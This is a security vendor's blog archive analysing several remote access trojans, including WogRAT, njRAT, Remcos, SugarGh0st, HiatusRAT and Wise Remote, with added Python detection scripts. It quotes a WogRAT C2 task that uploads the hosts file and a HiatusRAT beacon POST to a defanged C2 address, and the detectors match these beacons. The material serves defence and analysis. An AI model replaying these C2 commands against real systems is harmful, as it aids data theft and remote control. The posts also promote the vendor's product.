RAT Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/rat/

WingsOfGod.dll – WogRAT Malware Analysis & Removal
https://gridinsoft.com/blogs/wograt-wingsofgod-analysis-removal/
Fri, 08 Mar 2024 17:17:12 +0000

WogRAT, also known as WingsOfGod RAT, is a relatively new remote access trojan that targets users in Asian countries. Named after its own file, WingsOfGod.dll, the malware has been active since late 2022 and spreads through an online notepad service.

What is WogRAT (WingsOfGod.dll)?

WogRAT is a classic remote access trojan: a backdoor-like malicious program whose main purpose is to give the operator remote access to the infected system. ASEC researchers were the first to detect and track the campaign. They also note that the malware primarily targets Asian countries, China, Japan, Singapore and Hong Kong above all.

An odd thing about WogRAT is that no distribution campaign has been observed directly, even though the original research explains part of the mechanism. The malware (more precisely, its loader) is disguised as a file posted on an online notepad service. The file names suggest that the operators pass WogRAT off as some kind of system or program tweaking utility, which in turn suggests that the initial distribution happens in “closed” places such as messenger chats.

Figure: encoded strings stored in aNotepad

Loader file names observed on aNotepad:

BrowserFixup.exe, ChromeFixup.exe, WindowsApp.exe, WindowsTool.exe, HttpDownload.exe, ToolKit.exe, flashsetup_LL3gjJ7.exe

WogRAT Malware Technical Analysis

As noted above, what is downloaded from aNotepad is only the loader, stored in encoded form. Once run, the loader compiles its code on the fly and requests the actual payload from another page hosted on the same site. The page serving the second-stage payload varies between attacks.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 /OUT:C:\Users\\AppData\Local\Temp\RESF175.tmp c:\Users\\AppData\Local\Temp\2jahfobn\CSC51D40ACB8B5440B2A46FD286719924C.TMP

The command line used by the loader while compiling itself (cvtres.exe is invoked by the C# compiler to embed resources into the freshly built assembly).

The downloaded payload is another .NET assembly, Base64-encoded and stored as a text string on the source page. The loader decodes it and loads it into memory using the process hollowing technique.

C:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2068

(WerFault.exe launched with -p 8008 means Windows Error Reporting was invoked for process ID 8008 at this stage.)
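The loader's habit of fetching a Base64-encoded .NET assembly from a plain-text page suggests a simple hunting check. The Python script below is an added example, not code from the original article or from ASEC: it scans arbitrary page text for long Base64 runs, decodes each one and tests whether the result is a PE image with a non-empty CLR runtime header (data directory 14), which is what marks a .NET assembly. The sample page and the minimal PE header embedded in it are constructed for this demonstration, and the 200-character threshold is an arbitrary choice.

```python
import base64
import binascii
import re
import struct
from typing import Optional

# Base64 runs shorter than this are ignored; a real assembly is far larger.
# The value is an arbitrary threshold chosen for this example.
MIN_B64_LEN = 200
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_B64_LEN)

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14  # CLR runtime header: non-empty only in .NET images


def classify_pe(blob: bytes) -> Optional[dict]:
    """Return basic facts about a PE image, or None if blob is not a PE file."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", blob, e_lfanew + 4)
    opt = e_lfanew + 24                       # start of the optional header
    if opt + 2 > len(blob):
        return None
    (magic,) = struct.unpack_from("<H", blob, opt)
    if magic == 0x10B:                        # PE32
        nrva_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                      # PE32+
        nrva_off, dirs_off = opt + 108, opt + 112
    else:
        return None
    if nrva_off + 4 > len(blob):
        return None
    (nrva,) = struct.unpack_from("<I", blob, nrva_off)
    is_dotnet = False
    clr_off = dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    if nrva > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and clr_off + 8 <= len(blob):
        clr_rva, clr_size = struct.unpack_from("<II", blob, clr_off)
        is_dotnet = clr_rva != 0 and clr_size != 0
    return {"machine": machine, "sections": nsections,
            "pe32plus": magic == 0x20B, "dotnet": is_dotnet, "size": len(blob)}


def find_embedded_assemblies(text: str) -> list:
    """Scan page text for Base64 runs that decode to a PE image."""
    hits = []
    for m in _B64_RUN.finditer(text):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        info = classify_pe(blob)
        if info is not None:
            info["offset"] = m.start()
            hits.append(info)
    return hits


def _fake_dotnet_pe() -> bytes:
    """Constructed: the smallest PE32 header with a non-empty CLR directory (not a real binary)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                           # e_lfanew: "PE\0\0" at offset 64
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)  # i386, 1 section, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed page text: a long Base64 run that is not a PE, then the fake assembly.
SAMPLE_PAGE = (
    "BrowserFixup settings backup\n"
    + base64.b64encode(b"A" * 160).decode() + "\n"
    + base64.b64encode(_fake_dotnet_pe()).decode() + "\n"
)

if __name__ == "__main__":
    for hit in find_embedded_assemblies(SAMPLE_PAGE):
        print(hit)
```

Run against a saved copy of a suspicious paste page, the script reports the offset and size of every decodable PE and whether it carries a CLR header; the decoy run shows that ordinary Base64 text (backups, certificates) is decoded and discarded rather than flagged.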

On start-up, WogRAT collects basic system information by reading registry keys and running commands: network connections, OS version, user name and some details of the system policies. It bundles this data with information about its own process and sends it to the command server in an HTTP POST request, after which it goes idle and waits for commands.

act=on&bid=4844-1708721090438&name=System1\User1

WogRAT expects a rather interesting set of commands and properties from its server. In simplified form, each command consists of three elements:

Element             Value and purpose
task_id=%id%        text value that identifies the task
task_type=%type%    numeric value that selects the action
task_data=%data%    path of the file the task applies to (a URL for downloads)

The resulting command is like the following:

task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts

The malware supports five task types: run a file, download a file, upload a file, change the idle interval, and terminate. Not a long list at first glance, but download plus run already gives arbitrary payload delivery and upload gives exfiltration, which is the core of a full-fledged backdoor.
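To make the beacon and task format above concrete, here is an added Python parser (not code from the original article or from ASEC) that takes raw HTTP POST bodies in WogRAT's form-encoded style, classifies each as a beacon or a task and pulls out the fields a triage analyst would look at. It reads the bid value as “<numeric prefix>-<Unix time in milliseconds>”; that interpretation is an assumption based on the shape of the observed value, not something the research states. The sample bodies are the two quoted above plus one constructed unrelated body.

```python
from datetime import datetime, timezone
from urllib.parse import parse_qsl

BEACON_FIELDS = {"act", "bid", "name"}
TASK_FIELDS = {"task_id", "task_type", "task_data"}
WINDOWS_ROOT = "c:\\windows\\"


def parse_wograt_body(body: str) -> dict:
    """Classify one form-encoded POST body as a WogRAT beacon, a task, or unknown."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    keys = set(fields)
    if BEACON_FIELDS <= keys:
        return _beacon(fields)
    if TASK_FIELDS <= keys:
        return _task(fields)
    return {"kind": "unknown", "fields": fields}


def _beacon(f: dict) -> dict:
    out = {"kind": "beacon", "act": f["act"], "bid": f["bid"], "host_user": f["name"]}
    # Assumption, not from the research: bid looks like "<numeric prefix>-<Unix time in ms>".
    head, sep, tail = f["bid"].partition("-")
    if sep and head.isdigit() and tail.isdigit() and len(tail) == 13:
        out["bid_prefix"] = int(head)
        out["bid_time"] = datetime.fromtimestamp(int(tail) // 1000, tz=timezone.utc)
    return out


def _task(f: dict) -> dict:
    try:
        task_type = int(f["task_type"])
    except ValueError:
        task_type = None            # malformed: keep the task but do not guess the action
    data = f["task_data"]
    normalised = data.lower().replace("\\\\", "\\")   # collapse the doubled backslash seen in captures
    return {
        "kind": "task",
        "task_id": f["task_id"],
        "task_type": task_type,
        "task_data": data,
        "is_url": normalised.startswith(("http://", "https://")),
        "touches_windows_dir": normalised.startswith(WINDOWS_ROOT),
    }


def summarise(bodies):
    """Parse a batch of captured POST bodies in order."""
    return [parse_wograt_body(b) for b in bodies]


# Sample inputs: the two bodies quoted in the article plus one constructed unrelated body.
SAMPLE_BODIES = [
    "act=on&bid=4844-1708721090438&name=System1\\User1",
    r"task_id=upldr&task_type=3&task_data=C:\\Windows\System32\drivers\etc\hosts",
    "username=alice&remember=1",
]

if __name__ == "__main__":
    for msg in summarise(SAMPLE_BODIES):
        print(msg)
```

Feeding the parser the POST bodies from a proxy or IDS log gives a quick view of which hosts are beaconing and which tasks touch system files such as the hosts file, without having to read the raw query strings.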

How to remove WogRAT?

WogRAT is not the stealthiest malware around; it relies more on its tricky distribution and two-stage loader than on evasion. Still, the number of hooks it plants in the system makes it hard to remove by hand. For that reason, I recommend using GridinSoft Anti-Malware: a full scan with that program is enough to remove the RAT and all of its components.

Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide
https://gridinsoft.com/blogs/backdoorwin32-bladabindiml-analysis-removal-guide/
Tue, 05 Mar 2024 14:37:22 +0000

Backdoor:Win32/Bladabindi!ml is a detection name used by Microsoft Defender for the njRAT backdoor, a malware family capable of taking over and controlling victims' computers. This article explains when the detection indicates a real infection and when it is a false positive.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Microsoft Defender detection for njRAT, which is categorised as a backdoor. “Bladabindi” is one of many names antivirus vendors use to identify this family; njRAT is the most common.

njRAT is a trojan that can be installed on a computer without the user's knowledge. It acts as a backdoor, giving attackers remote access to and control over the infected system. Once installed, it can collect sensitive information, log keystrokes, steal passwords, intercept traffic and even control the webcam and microphone.

njRAT execution chain

Bladabindi!ml spreads in a variety of ways: email attachments and malicious links, downloads from malicious websites, exploitation of software vulnerabilities, and social engineering. It can also self-propagate by infecting USB drives connected to an infected computer.

Bladabindi Backdoor Threat Analysis

njRAT exists in several versions seen in different attacks, but they differ little in capabilities and effects. Let's look at what a typical Bladabindi sample does to a system.

Launch and Detection Evasion

Bladabindi uses several techniques to evade detection at launch. It ships with a builder that lets the operator configure the payload before delivery: the executable name, whether to create a startup key in the registry, the directory to install into on the target, the C2 host IP address and network port, among others.

Figure: njRAT builder and custom settings

Such customisation lets njRAT slip past many static antivirus checks. In addition, the code is passed through multiple .NET obfuscators, making it hard to analyse for both humans and automated tools. These features make njRAT a tough nut to analyse and detect, and largely account for its longevity.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor establishes persistence by dropping a startup item, typically in the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” directory. It also creates a registry key with a unique name made of random characters and digits under “HKEY_CURRENT_USER\Software\32”. Together these ensure that the malware runs each time the system boots and keeps its foothold across reboots.

Figure: registry entry created by the malware during installation
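The two persistence locations described above (a Startup folder item and a value under a non-standard HKCU\Software key) can be triaged with a few heuristics. The Python below is an added example, not code from the original article: given a list of autorun entries, it flags those whose binary lives in a user-writable directory, whose name looks random (letters and digits with high entropy), or whose registry key is not one of the standard Run keys, and reports entries that match at least two of the three. The sample entries are constructed; on Windows, collect_live() reads the real HKCU Run key and the per-user Startup folder through the standard-library winreg module, and on other platforms it returns nothing.

```python
import math
import os
import sys
from collections import Counter
from dataclasses import dataclass

# Standard per-user/machine Run keys; anything else under HKCU\Software is unusual for autostart.
STANDARD_RUN_KEYS = (
    r"hkcu\software\microsoft\windows\currentversion\run",
    r"hklm\software\microsoft\windows\currentversion\run",
)
# Directory markers an installer rarely uses for an autostart binary.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


@dataclass
class AutorunEntry:
    source: str            # "startup_folder" or "registry"
    name: str              # file name in the Startup folder, or registry value name
    target: str            # path of the executable that will run
    key: str = ""          # registry key path for registry entries


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_random(name: str) -> bool:
    """Letters mixed with digits and high entropy, e.g. '5cd8f1ab93e4' (constructed)."""
    stem = os.path.splitext(name)[0]
    return (len(stem) >= 8
            and any(ch.isdigit() for ch in stem)
            and any(ch.isalpha() for ch in stem)
            and shannon_entropy(stem) > 3.0)


def triage(entries, min_reasons: int = 2):
    """Return (entry, reasons) for entries matching at least min_reasons heuristics."""
    findings = []
    for e in entries:
        reasons = []
        if any(m in e.target.lower() for m in USER_WRITABLE_MARKERS):
            reasons.append("binary in user-writable location")
        if looks_random(e.name):
            reasons.append("random-looking name")
        if e.source == "registry" and not e.key.lower().startswith(STANDARD_RUN_KEYS):
            reasons.append("non-standard registry key")
        if len(reasons) >= min_reasons:
            findings.append((e, reasons))
    return findings


def collect_live():
    """Windows only: HKCU Run values and the per-user Startup folder. Returns [] elsewhere."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    run_key = r"Software\Microsoft\Windows\CurrentVersion\Run"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, run_key) as k:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(k, i)
            except OSError:
                break
            entries.append(AutorunEntry("registry", name, str(value), "HKCU\\" + run_key))
            i += 1
    startup = os.path.join(os.environ.get("APPDATA", ""),
                           r"Microsoft\Windows\Start Menu\Programs\Startup")
    if os.path.isdir(startup):
        for fn in os.listdir(startup):
            entries.append(AutorunEntry("startup_folder", fn, os.path.join(startup, fn)))
    return entries


# Constructed sample: one benign Run value and two entries shaped like the njRAT persistence described above.
SAMPLE_ENTRIES = [
    AutorunEntry("registry", "OneDrive",
                 r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
                 r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"),
    AutorunEntry("startup_folder", "5cd8f1ab93e4.exe",
                 r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\5cd8f1ab93e4.exe"),
    AutorunEntry("registry", "d4c1e9f7b2a0",
                 r"C:\Users\user\AppData\Roaming\svchost.exe", r"HKCU\Software\32"),
]

if __name__ == "__main__":
    for entry, reasons in triage(collect_live() or SAMPLE_ENTRIES):
        print(entry.name, "->", "; ".join(reasons))
```

The two-reason threshold is deliberate: a legitimate OneDrive autostart also lives under AppData, so a single heuristic would drown the analyst in noise, while the njRAT-style entries trip two or three at once.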

Data Collection & Other Functionality

Once set up, njRAT (Bladabindi) makes some basic call-outs to the command server. Depending on the response, it can go idle, start collecting user data, or pull an additional payload from the server. The full list of actions it can perform:

  • Executing remote shell commands
  • Downloading and uploading files
  • Capturing screenshots
  • Logging keystrokes
  • Camera and microphone access
  • Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some legitimate programs have features or behaviours that antivirus software may consider suspicious, so Microsoft Defender occasionally raises a false positive. Typical triggers are the use of certain APIs, network requests or data encryption that are characteristic of malware but also present in legitimate applications.

Note that the “!ml” suffix in the detection name marks a verdict from Defender's machine-learning detection engine. That engine is effective, but without confirmation from signature- or behaviour-based detections it is prone to false positives.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is a reputable antivirus with up-to-date databases. I recommend GridinSoft Anti-Malware; it is well suited to detecting and removing even sophisticated malware such as Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, run additional scans to make sure all threats are gone. Going forward, be careful when browsing and downloading files: avoid suspicious websites and attachments from untrusted sources.

Remcos RAT Targets South Korean Users Through Webhards
https://gridinsoft.com/blogs/remcos-rat-targets-south-korea-webhards/
Mon, 15 Jan 2024 21:39:20 +0000

The infamous Remcos RAT has reportedly started targeting South Korean users through files shared on the Webhards platform. Baiting users with cracked software and adult content, the attackers get them to run a malicious script that downloads and launches the remote access trojan.

Remcos RAT Uses Webhards to Spread

Recent research by the South Korean cybersecurity firm AhnLab describes a new Remcos RAT distribution campaign. It names Webhards as the malware's chosen entry point onto user devices. Webhards is a file-sharing platform popular among software pirates and people looking for free content. It has legitimate uses, but a number of analysts name it, along with torrents, as a common source of malware.

In the Remcos case, the attackers use “hot topics”, adult content or cracked versions of new games, to get the user to download the infected package. The post on the site then asks the user to run a Game.exe file included in the downloaded archive. Running it kicks off a chain of VBS scripts that download the final payload.

Figure: ZIP archive with a cracked game containing the Game.exe file. Source: AhnLab

Once downloaded, another set of scripts injects Remcos into ServiceModelReg.exe, a built-in .NET Framework console tool that normally runs only during installation and has no everyday use. Well, until this instance of Remcos finds its way onto the machine, apparently.

What is Remcos RAT?

Remcos is a remote access trojan marketed as a legitimate remote administration tool by the German firm BreakingSecurity. First advertised in 2016, it became particularly popular in 2020 and 2021, when threat actors spread it through COVID-themed emails. Its activity has since become more moderate, averaging around 30 samples per day during 2023.

Figure: Remcos RAT activity graph (12/17/2023 – 01/15/2024)

In terms of functionality, Remcos is a classic RAT: it provides full-featured remote access to the infected system, including the system menus and the file system. It can also record the screen, take screenshots and set activity alarms. To tell infected systems apart, the malware collects basic information: OS version, date, time and some basic hardware details.

How to protect against threats?

Looking at how the malware spreads already answers the question of how to protect yourself. In the Remcos case, the obvious answer is to avoid cracked software: it is both a malware risk and copyright infringement, so steering clear of it is strongly recommended, especially on websites known to be used for malware distribution.

As an additional, passive layer of protection, keep anti-malware software running in the background. A modern, well-maintained antivirus catches most payloads regardless of the malware family. GridinSoft Anti-Malware is one you can rely on; its detection system works well in both proactive and reactive modes.

SugarGh0st RAT Targets Uzbekistan and South Korea
https://gridinsoft.com/blogs/sugargh0st-rat-targets-governments/
Fri, 01 Dec 2023 22:24:44 +0000

A new malicious campaign employs SugarGh0st RAT to target government agencies. Artifacts in the decoy documents hint at a potential Chinese-speaking actor.

SugarGh0st Uses Spear Phishing to Attack Governments

Researchers have uncovered a new wave of attacks targeting government entities in Uzbekistan and South Korea. The campaign uses a customised variant of the infamous Gh0st RAT, dubbed SugarGh0st, and a sophisticated multi-stage infection chain.

The targets were foreign ministry personnel, lured with documents about investment projects, account credentials and internal memos, topics chosen to make victims enable the malware unknowingly while viewing what looked like legitimate work documents. Together with other artefacts, the choice of targets points toward a Chinese-speaking operator, although attribution remains tentative.

Figure: fake document used as a disguise to launch the malware attack

Multi-stage infection chain

Once delivered by email, the malicious documents trigger a multi-stage installation of SugarGh0st. JavaScript and shortcut files execute commands that drop the RAT executable, decrypt it and activate its full functionality in the background. Living-off-the-land binaries, DLL side-loading and abuse of legitimate Windows utilities help hide the deployment from defences and from the user. The operational security on display suggests an adversary that carefully honed its tradecraft before going after sensitive agencies.

Following the installation, SugarGh0st offers advanced monitoring, exfiltration, and manipulation capabilities. This surpasses typical malware in commodity cybercrime operations. Functions allow recording keystrokes, activating webcams, executing files, or killing processes – all directed dynamically by attacker commands. Such comprehensive access risks the integrity of infected government agencies through unconstrained internal spying.

Depending on the victims' operational security, lateral movement could also expose wider departmental and ministry networks. The total damage is hard to assess, but the implications are clearly severe, and stolen secrets of this kind can be used to influence international affairs.

A Gh0st RAT Variant and Potential Chinese Connection

While the attribution remains speculative, artifacts in the decoy documents hint at a potential Chinese-speaking actor. Two files within the campaign contain Chinese characters in their “last modified by” names, suggesting a linguistic connection to China. As the name suggests, SugarGh0st represents an evolution of existing Chinese-linked Gh0st RAT variants in circulation for over 15 years. Developed by the Chinese group 红狼小组 (C.Rufus Security Team), Gh0st RAT has been active since 2008.

SugarGh0st retains the core functionalities of its predecessor but features customized reconnaissance capabilities and a modified communication protocol. The malware granted threat actors total remote control to pillage confidential data from infected networks. Enhancements include:

  • expanded anti-detection tactics
  • reconnaissance commands tailored to harvest documents and credentials
  • new communications disguising C2 servers as Google Drive domains

Attacks on government entities, embassies and ministries in particular, are nothing new; states have always spied on one another, and only the tools change. What stands out is that Chinese- and North Korean-linked groups keep reusing recognisable, long-lived tool families such as Gh0st RAT rather than hiding behind fresh tooling, which makes their activity among the most publicly documented.

HiatusRAT Used in Attacks on Taiwan Companies and U.S. Military
https://gridinsoft.com/blogs/hiatusrat-attacks-taiwan-us-military/
Tue, 22 Aug 2023 10:20:01 +0000

Recent attacks on US military systems and Taiwanese companies stand out not only for their bold choice of targets but also for the toolkit involved. In both cases the attackers used HiatusRAT as an initial access and reconnaissance tool. Beyond these attacks, the Hiatus trojan has other things to boast of.

US DoD and Taiwan Companies Cyberattacks

First, the attacks on well-known organisations and companies. The long-running campaign against Taiwanese companies and at least one government organisation was detected in August 2023. Lumen researchers, who had studied the HiatusRAT botnet before, noticed a new stream of connections coming from Taiwanese IP ranges. Soon after, attacks on chemical manufacturers, semiconductor manufacturers and a municipal government were uncovered.

The story around the U.S. Department of Defence is a bit different. The same research group saw traffic to botnet-associated IP addresses coming not only from Taiwan but also from the US. Specifically, the operators used one of the botnet's Tier 2 servers to connect to a DoD server that handles defence contracts. Fortunately, no deep penetration occurred; the attackers were most probably performing reconnaissance ahead of further action.

HiatusRAT Analysis

The first thing you notice about Hiatus is its network architecture. Instead of infecting endpoints, it targets networking devices, and has done so since its emergence in late 2021. Routers are gateways for enormous amounts of information, and full control over one can sometimes yield far more than compromising the computers behind it. Nothing stops Hiatus from delivering additional payloads to those systems either. Beyond sniffing, a fleet of compromised routers also works as a proxy network that hides the operators' real IP addresses from their targets.

HiatusRAT functional scheme

To spread the payload, the attackers look for business-grade routers running vulnerable firmware. The botnet's first victims were DrayTek Vigor 2960 and 3900 routers. Today the malware has builds for Arm, i386, x86-64 and MIPS/MIPS64, which covers a large number of devices, all the more so because firmware updates on network infrastructure are applied even more reluctantly than patches to regular software.

Execution flow

The attack chain that gets the RAT onto the router is still not fully clear. What is clear is that, after gaining initial access, the attackers run a shell script that downloads the payload and an auxiliary utility: a custom build of tcpdump, the command-line packet capture tool.

On execution, HiatusRAT first checks for other processes listening on port 8816; if it finds one, it kills it and then proceeds with its normal start-up. Next comes a fairly classic step: gathering basic information about the device, including the MAC address, architecture, firmware and kernel versions. It also enumerates the file system and any files held in internal memory.

Once these checks are done, the malware reads a small JSON blob that appears to be its configuration and retrieves the C2 server addresses from it. Besides the “main” server there is a second one that receives all the packets captured with the modified tcpdump. The first request to the control server is a classic HTTP POST whose fields carry the system information gathered in the previous step.

HTTP POST request example

POST /master/Api/active?uuid=005056c00001 HTTP/1.1
Host: 104.250.48[.]192:443
Accept: */*
Content-Type: application/json
X_UTIME: 1674762549
X_UUID: 005056c00001
X_TOKEN: ffca0c6ca91ce7070c3e5e41d7c983a2
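The request above is distinctive enough to match in captured traffic. The Python below is an added example, not code from the original article or from Lumen: it parses a raw HTTP request, then checks for the beacon path, the X_UTIME/X_UUID/X_TOKEN header triplet, the shapes of those values (a 12-hex-digit uuid, a 32-hex-digit token, an epoch timestamp in a plausible range) and agreement between the uuid query parameter and X_UUID. The sample request is rebuilt from the one shown above with an empty body, and the defanged Host value is kept as printed. Calling the token “MD5 sized” is only an observation about its length, not a claim about how it is derived.

```python
import re
import time
from urllib.parse import parse_qsl

BEACON_PATH = "/master/Api/active"
BEACON_HEADERS = ("X_UTIME", "X_UUID", "X_TOKEN")


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, version, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split(" ", 2) + ["", "", ""]   # pad so a short request line cannot crash us
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return {"method": parts[0], "path": parts[1], "version": parts[2],
            "headers": headers, "body": body}


def hiatus_indicators(req: dict, now: float = None) -> list:
    """List the HiatusRAT beacon traits present in a parsed request."""
    now = time.time() if now is None else now
    h = req["headers"]
    path, _, query = req["path"].partition("?")
    found = []
    if req["method"] == "POST" and path == BEACON_PATH:
        found.append("beacon path")
    if all(k in h for k in BEACON_HEADERS):
        found.append("X_UTIME/X_UUID/X_TOKEN header triplet")
        if re.fullmatch(r"[0-9a-f]{12}", h["X_UUID"]):
            found.append("12-hex-digit uuid (MAC-address sized)")
        if re.fullmatch(r"[0-9a-f]{32}", h["X_TOKEN"]):
            found.append("32-hex-digit token (MD5 sized)")
        if h["X_UTIME"].isdigit() and 1_600_000_000 <= int(h["X_UTIME"]) <= now + 86400:
            found.append("X_UTIME is a plausible Unix timestamp")
    params = dict(parse_qsl(query))
    if params.get("uuid") and params["uuid"] == h.get("X_UUID"):
        found.append("uuid query parameter matches X_UUID")
    if h.get("Host", "").endswith(":443"):
        # Meaningful only for requests captured in the clear: plain HTTP aimed at the HTTPS port.
        found.append("plain HTTP addressed to port 443")
    return found


def is_hiatus_beacon(req: dict, now: float = None) -> bool:
    """Minimum bar: the beacon path together with the custom header triplet."""
    ind = hiatus_indicators(req, now)
    return "beacon path" in ind and "X_UTIME/X_UUID/X_TOKEN header triplet" in ind


# Constructed from the request printed in the article; body left empty, Host kept defanged.
SAMPLE_REQUEST = (
    "POST /master/Api/active?uuid=005056c00001 HTTP/1.1\r\n"
    "Host: 104.250.48[.]192:443\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/json\r\n"
    "X_UTIME: 1674762549\r\n"
    "X_UUID: 005056c00001\r\n"
    "X_TOKEN: ffca0c6ca91ce7070c3e5e41d7c983a2\r\n"
    "\r\n"
)
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"

if __name__ == "__main__":
    req = parse_http_request(SAMPLE_REQUEST)
    print(is_hiatus_beacon(req), hiatus_indicators(req))
```

The weaker indicators (value shapes, the port-443 quirk) are reported separately so they can raise the severity of an alert without being required for the match; a rebuilt sample that changes the path but keeps the header names would still surface through the triplet check.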

HiatusRAT Functionality

I have already mentioned the tcpdump-like tool that provides a significant part of the RAT's functionality, but it does not stop there. Hiatus accepts commands from its server that alter its behaviour or even shut it down. Notably, some of these commands have not been observed in use so far, even though they have been present since the malware's first release in 2021.

Command       Description
Socks5        Sets up a SOCKS5 proxy (RFC 1928) on the compromised device, allowing port forwarding and listening.
File          Designates a file on the infected host to read, delete or upload to the C2.
Executor      Downloads a file from the command server and executes it.
Tcp_forward   Takes a forwarding IP and listening/forwarding port configuration and applies it to the router, so that any TCP traffic hitting the listening port is forwarded.
Script        Like Executor, but downloads and runs a script from the C2.
Shell         Spawns a remote shell on the compromised router. Together with Executor and Script, this provides the malware delivery functionality.
Quit          Terminates the malware and stops all of its operations.

How to protect against network infrastructure attacks?

Hiatus used to target routers of specific architectures and series, but it now covers a wide range of devices. Since the way the attackers deploy it is still unclear, there are few reactive measures to recommend. Instead, here are several proactive ones.

Use advanced network protection. Antivirus programs are not very effective at preventing this RAT's infection. Network protection tools, especially behaviour-based ones, can detect and block the intruder by what it does. Network Detection and Response systems, combined with SOAR and user behaviour analytics, work well against tricky malware attacks on the environment.

Update (or replace) your networking devices regularly. Since vulnerable router firmware is the key to the malware's entry, keeping it updated is essential. Keep an eye on attacks that exploit vulnerabilities in networking devices; manufacturers usually release updates within weeks. Unfortunately, really old devices may have reached end-of-life and receive no support at all. In that case, replacing the device is the only definitive way to remove the hazard.

Keep solid anti-malware software on hand. I just said anti-malware programs are not very effective here, and now I say they are nice to have; inconsistent? Not really: anti-malware acts as a preventive layer against whatever HiatusRAT delivers through its download-and-execute functionality. Multi-layered defences are always harder to get through, at least without raising an alarm.

Wise Remote Trojan: Infostealer, RAT, DDoS Bot, and Ransomware
https://gridinsoft.com/blogs/wise-remote-trojan-infostealer-rat-ddos-bot-and-ransomware/
Mon, 10 Jul 2023 18:30:46 +0000

Wise Remote Stealer is a potent piece of malware that operates as an infostealer, Remote Access Trojan (RAT), DDoS bot and ransomware. It has gained notoriety in the cybersecurity community for its wide range of capabilities and the threat it poses to individuals and organisations.

Unveiling the Wise Remote Stealer

Revelations from cybersecurity experts have shed light on a growing menace from the underbelly of the internet known as “Wise Remote”. Operated as Malware-as-a-Service (MaaS), this malware has emerged as a highly adaptable and insidious tool: remote access, DDoS botnet recruitment, data theft and even extortion, a combination that should alarm organisations and individuals alike.

The Stealthy Proliferation of Wise Remote Stealer

Figure: Wise Remote Stealer advertised on the cracked[.]io forum

Since its initial appearance in early June, Wise Remote Stealer has been making waves across hacker forums such as HF and cracked-io. Its shadowy creators tirelessly refine and enhance their creation, showcasing its malevolence on platforms like Discord and Telegram. Disturbingly, these demonstrations have ensnared and impacted the lives of over a thousand unsuspecting victims, cementing its reputation as a significant threat.

Written in a mix of Go, C++, C# and Python, Wise Remote primarily targets Windows 8, 10 and 11. Its developers employ various evasion techniques to slip past conventional antivirus products, and all communication with the command-and-control (C2) server, hosted in Switzerland, is encrypted.

The Tactical Ingenuity of Wise Remote

Wise Remote operates with calculated precision. Through cloud-based module imports and careful staging of data on the victim's disk, it conceals its activity, and once the sensitive information has been exfiltrated it erases its traces, leaving few digital footprints behind.

Subscribers to this nefarious service gain access to a comprehensive builder, allowing for customization and fine-tuning of the malware’s appearance and behavior. Remarkably, the resulting payloads rarely exceed 100 kilobytes, facilitating rapid dissemination and maximizing its reach.

The existing capabilities of Wise Remote Stealer are indeed alarming:

  • Systematic collection of extensive system information, giving the operators a profile of every infected host.
  • Creation of a reverse shell, granting full remote access to and control over the compromised system.
  • Downloading and executing additional malicious files, so the infection can be extended with further payloads.
  • Extraction of data from web browsers, including saved passwords, cookies, banking credentials, bookmarks, browsing history and installed extensions.
  • Theft of funds from victims' cryptocurrency wallets.
  • Covertly opening and interacting with websites so that the traffic looks like legitimate user activity.
  • Stealthy capture of screenshots, which may expose sensitive and confidential information.
  • Use of the AppData folder as a discreet drop location for uploaded files.
  • A builder that lets the operator tailor agents and modules to specific targets and preferred attack vectors.
  • Covering its tracks by manipulating system logs to erase traces of malicious activity.

